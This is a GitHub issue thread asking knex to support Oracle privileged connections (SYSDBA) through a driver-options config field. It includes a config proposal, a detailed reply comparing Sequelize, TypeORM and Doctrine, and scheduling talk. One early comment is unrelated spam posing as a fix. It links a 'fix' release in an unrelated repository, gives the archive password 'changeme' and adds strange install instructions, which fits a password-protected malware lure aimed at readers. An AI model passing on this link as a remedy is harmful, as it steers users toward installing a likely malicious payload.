### ISSUE TITLE
Support for Oracle Privilege Role config

### ISSUE THREAD

**Issue by hanseltime** [knex/knex#6117]
# Environment

Knex version: 3.1.0
Database + version: Oracle 23ai (but all oracles)
OS: Pop_Os

@atiertant - Tagging as this is an oracle feature request

# Feature discussion / request

1. I was excited to use knex to manage in-time migrations for OracleDB across my team.  When I was prototyping this, I ran into the unfortunate circumstance that some of my operations (like adding custom types), required me to perform those under the the SYSDBA role.  After looking at the code for the oracledb client [here](https://github.com/knex/knex/blob/176151d8048b2a7feeb89a3d649a5580786d4f4e/lib/dialects/oracledb/index.js#L129-L164), it looks like there is no way to add the [privilege option for the underlying library](https://node-oracledb.readthedocs.io/en/latest/user_guide/connection_handling.html#privileged-connections).

I came from sequelize usage, where Sequelize has a dialectOptions field to allow for users to configure their driver specific needs and accidentally assumed this was the same case here.  For the current use case, at the very least having either a "privilege" field for oracledb dialect or a dialectOptions field that spreads into the rest of the options would be ideal.

3. Explain what kind of feature would support this

As stated above, some sort of config field that would allow us to configure the driver specific connection options feels like the simplest fix.  If we wanted to minimize it, it could just be for oracleOptions.

```typescript
export default {
  // This would be config for all drivers and would be a little extra scope beyond oracle
  generalForAllConfig: {
    client: 'oracledb',
    connection: {
      user: 'myUser',
      password: '****',
      database: 'DB',
      driverOptions: {
         privilege: oracledb.SYSDBA,
      }
    }
  },
  // This would be a smaller scope with a busier set of fields were this to expand
  justForOracleDbConfig: {
     client: 'oracledb',
    connection: {
      user: 'myUser',
      password: '****',
      database: 'DB',
      oracleOptions: {
         privilege: oracledb.SYSDBA,
      }
    }
  }
}
```

5. Give some API proposal, how the feature should work

From the above defined config, we could roll out driverOptions as a whole config field that will `Supply the provided driver
options to underlying driver that you chose when specifying your client`.  Additionally, I would propose that we overlay the common config items that are explicit on top of the supplied driverOptions to ensure backwards compatibility (i.e. we use the knex common config API first before using this option). 

If we wanted to roll out oracle first as a test case for this, we could throw errors if the client does not yet implement "driverOptions".

Additionally, depending on the knex team's design paradigm, we could also throw errors for any driverOptions that overlap with config keys that knew would normally fill in.  However, that would add additional burden to long term development and may be
better fixed by having documentation say that and letting the user find that out.

## I would be willing to contribute this feature if the knex team agrees on the implementation. 

This feature is blocking my full usage of the knex project to manage migrations so I would be invested in getting a pull request up quickly if we can define the configuration API definitions and error handling that the team agrees on.

Thanks for your time and let me know!

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mercmobily** [comment]
@hanseltime  You still around?

Thank you for opening this issue and for offering to contribute! This is a well-thought-out feature request with clear use cases and API proposals.

Your observation about the missing `privilege` option for Oracle connections is absolutely correct. Looking at the current implementation in lib/dialects/oracledb/index.js:129-163, Knex only passes a limited set of connection options to the node-oracledb driver. The code currently builds the `oracleDbConfig` object with only these properties:

- `externalAuth` (for Oracle Wallet authentication)
- `user` and `password` (for standard authentication)
- `connectString` (for connection routing)
- `prefetchRows` (mapped from `prefetchRowCount`)
- `stmtCacheSize` (statement cache size)

The `privilege` option, which is essential for administrative operations like creating custom types under SYSDBA role, is not being passed through. This is even though node-oracledb has supported privileged connections since version 2.1.0, and as of version 6.5.1, even supports privileges in connection pools (per oracle/node-oracledb#1657).

The node-oracledb library supports several privilege constants: `SYSDBA` (2), `SYSOPER` (4), `SYSASM` (32768), `SYSBACKUP` (131072), `SYSDG` (262144), `SYSKM` (524288), and `SYSRAC` (1048576). These are critical for various administrative tasks in Oracle databases.

This issue highlights a broader architectural challenge in Knex: there's currently no general mechanism for passing driver-specific options through to the underlying database drivers. This same problem exists across multiple dialects:

- Issue #4556 demonstrates the same limitation with the MSSQL/tedious driver, where Azure Active Directory authentication options cannot be properly passed through
- Issue #5813 (which I responded to) discusses the lack of documentation for Oracle-specific features, noting that "connection parameters are not passed directly to driver with oracle"

The pattern you've observed in Sequelize with `dialectOptions` is indeed the industry standard approach. Other ORMs and query builders have solved this problem:

- **Sequelize** uses `dialectOptions` that are passed directly to the underlying driver
- **TypeORM** uses an `extra` property for driver-specific options
- **Doctrine DBAL** (PHP) uses `driverOptions` for arbitrary driver options

Knex's current approach has been to explicitly map specific driver options on a case-by-case basis (like `externalAuth`, `prefetchRowCount`, and `stmtCacheSize` for Oracle). Even though this provides type safety and documentation, it creates maintenance burden and cannot keep pace with all driver-specific features across all supported databases.

Your proposed API is sensible and follows established patterns. Of the two options you suggested, I believe a general `driverOptions` field would be more maintainable and future-proof:

```javascript
{
  client: 'oracledb',
  connection: {
    user: 'myUser',
    password: '****',
    database: 'DB',
    driverOptions: {
      privilege: oracledb.SYSDBA,
    }
  }
}
```

This approach would:
1. Allow passing any driver-specific option without requiring Knex code changes
2. Maintain backwards compatibility by overlaying explicit Knex options on top of driverOptions
3. Work consistently across all database dialects
4. Reduce long-term maintenance burden

The implementation would need to:
- Merge `driverOptions` with the standard connection options in each dialect's `acquireRawConnection` method
- Ensure Knex's explicit mappings take precedence over driverOptions (for backwards compatibility)
- Update TypeScript definitions to include the optional `driverOptions` field
- Add documentation showing how to use driverOptions for each supported database
- Consider whether to validate or warn about conflicting options

Even though this is a valid feature request that would benefit many users, there are important considerations:

**Backwards Compatibility**: The implementation must ensure that existing connection configurations continue to work exactly as they do now. The explicit options (user, password, host, etc.) should always take precedence over anything in driverOptions.

**Type Safety**: For TypeScript users, the driverOptions field would need to be properly typed. This could be challenging since each driver has different options, though TypeScript's conditional types could help here.

**Documentation Burden**: Each database dialect would need documentation showing which driver it uses and linking to that driver's documentation for available options.

**Maintenance Philosophy**: The Knex maintainers would need to decide whether this aligns with the project's design philosophy. Does Knex want to be a thin wrapper that passes options through, or does it prefer the current explicit approach?

I'd recommend that before implementing this feature, we should get input from the core maintainers (@kibertoad ) on whether they support adding a general driverOptions mechanism versus continuing with the explicit option mapping approach. Their perspective on the architectural direction would be valuable.

If the maintainers agree with the driverOptions approach, I'd suggest starting with Oracle as a pilot implementation, since you have an immediate use case. This would allow the team to validate the approach before rolling it out to other dialects.

@kibertoad comments? Ideas? Wisdom?

**Comment by hanseltime** [comment]
@mercmobily - I've since moved on from the job that required this (and wrote a rather large work around).  While I may be willing to open a feature for it, I have competing development work in python at the moment which might not make me the most available or motivated to do the feature fast.

If a contributor wants to slate this though and ask, I can try to make something work on a weekend within their "give it a try" timeline.

**Comment by mercmobily** [comment]
OK. I will get in touch when I get to this, once the triaging is finished (I am going through hundreds of issues and getting rid of duplicates etc.) You are not in a hurry right?

**Comment by hanseltime** [comment]
Personally, I am not.  Are you a maintainer now?

**Comment by mercmobily** [comment]
@hanseltime Well, I will be in the future. For now, I am Just humbly going through 1180 issues and trying to make sense of them all (many of them are duplicate, stale, already implemented, etc.) with the help of AI and tons of hours. The idea in the longer term is that yes, everything going well, I will be knowledgeable enough to maintain it. But there is a lot to do still, and for now  I am just grinding through the issues.
